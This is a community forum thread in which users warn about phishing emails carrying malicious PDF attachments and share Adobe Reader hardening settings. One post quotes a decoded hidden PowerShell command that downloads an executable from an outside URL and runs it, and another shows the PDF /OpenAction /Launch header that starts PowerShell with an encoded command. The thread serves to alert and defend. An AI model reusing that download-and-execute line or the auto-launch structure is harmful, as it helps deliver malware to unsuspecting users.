Community Discussions and Support
Malicious content in .pdf attachments

[quote user="irelam"]In Adobe Reader you can disable Javascript via the menu Preferences/Javascript and uncheck the Enable Acrobat Javascript.  I am not sure if this would complelely protect you but it is worth a try. Seems there is also a way of involving Group Policy controlling Reader execution.
[/quote]

You also need to disable opening of non-PDF attachments using external applications.  That setting is on the "Trust Manager" page of Preferences.  I also always disable "Allow multimedia operations" on the Preferences/Multimedia Trust (legacy) page -- I don't want a malware 0-day Flash attachment to start playing in Reader.

Unfortunately all these options are per-user, not per-computer, so you would need to do it for every login on your computer.  Might be able to configure them using Group Policy in a domain setting, but I don't know how.  I can only find the Javascript option in the registry, the MMTrust and TrustMgr don't have separate keys under Adobe Reader.

<p>[quote user="irelam"]In Adobe Reader you can disable Javascript via the menu Preferences/Javascript and uncheck the Enable Acrobat Javascript.  I am not sure if this would complelely protect you but it is worth a try. Seems there is also a way of involving Group Policy controlling Reader execution. [/quote] </p><p>You also need to disable opening of non-PDF attachments using external applications.  That setting is on the "Trust Manager" page of Preferences.  I also always disable "Allow multimedia operations" on the Preferences/Multimedia Trust (legacy) page -- I don't want a malware 0-day Flash attachment to start playing in Reader. </p><p>Unfortunately all these options are per-user, not per-computer, so you would need to do it for every login on your computer.  Might be able to configure them using Group Policy in a domain setting, but I don't know how.  I can only find the Javascript option in the registry, the MMTrust and TrustMgr don't have separate keys under Adobe Reader. </p>

All,

Just a heads up to let you know that I have recently received two messages here at the office that carried a .pdf attachment containing a base64 encoded script.  The decoded content of one of them was:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/mike.exe', $env:APPDATA\mike.exe);Start-Process ($env:APPDATA\mike.exe)

I had heard that .pdf files could carry malicious content but this is the first one I have actually seen (assumption:  mike.exe is malicious). 

These messages looked very genuine with subjects like "New order inquiry" and content like "Please find the attached PO copy and New order...".   

This is social engineering at a very high level.  Be careful out there!

<p>All, Just a heads up to let you know that I have recently received two messages here at the office that carried a .pdf attachment containing a base64 encoded script.  The decoded content of one of them was: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/mike.exe', $env:APPDATA\mike.exe);Start-Process ($env:APPDATA\mike.exe) I had heard that .pdf files could carry malicious content but this is the first one I have actually seen (assumption:  mike.exe is malicious).  </p><p>These messages looked very genuine with subjects like "New order inquiry" and content like "Please find the attached PO copy and New order...".    </p><p>This is social engineering at a very high level.  Be careful out there! </p>

Brian

  What did you use to decode the base64 script. In particular was it done by Adobe code ?  Did you know that a Pdf file could contain an attachment, and following on from that, is there a marker that declares this kind of content.  For example we can detect an encrypted zip file in Virscan.

Martin 

<p>Brian</p><p>  What did you use to decode the base64 script. In particular was it done by Adobe code ?  Did you know that a Pdf file could contain an attachment, and following on from that, is there a marker that declares this kind of content.  For example we can detect an encrypted zip file in Virscan.</p><p>Martin  </p>

The red flag was content visible in the preview pane.  Here are the lines up to the encoded part:

%PDF-1.1
1 0 obj
<<
/OpenAction <<
/S /Launch/Win
<<
/F (C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe) /P
(powershell.exe -EncodedCommand

I use Tracker-Software products for my pdf viewing/editing so I posted on their support forum inquiry into built-in protection.  Someone there decoded it.

See: www.tracker-software.com/forum3/viewtopic.php?f=62&t=25640.


&lt;p&gt;The red flag was content visible in the preview pane.&amp;nbsp; Here are the lines up to the encoded part:&lt;/p&gt;&lt;p&gt;%PDF-1.1 1 0 obj &amp;lt;&amp;lt; /OpenAction &amp;lt;&amp;lt; /S /Launch/Win &amp;lt;&amp;lt; /F (C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe) /P (powershell.exe -EncodedCommand&lt;/p&gt;&lt;p&gt;I use Tracker-Software products for my pdf viewing/editing so I posted on their support forum inquiry into built-in protection.&amp;nbsp; Someone there decoded it.&lt;/p&gt;&lt;p&gt;See: www.tracker-software.com/forum3/viewtopic.php?f=62&amp;amp;t=25640. &lt;/p&gt;&lt;p&gt; &lt;/p&gt;

In Adobe Reader you can disable Javascript via the menu Preferences/Javascript and uncheck the Enable Acrobat Javascript.  I am not sure if this would complelely protect you but it is worth a try. Seems there is also a way of involving Group Policy controlling Reader execution.

In Adobe Reader you can disable Javascript via the menu Preferences/Javascript and uncheck the Enable Acrobat Javascript.&amp;nbsp; I am not sure if this would complelely protect you but it is worth a try. Seems there is also a way of involving Group Policy controlling Reader execution.
live preview
enter atleast 10 characters
WARNING: You mentioned %MENTIONS%, but they cannot see this message and will not be notified
Saving...
Saved
With selected deselect posts show selected posts
All posts under this topic will be deleted ?
Pending draft ... Click to resume editing
Discard draft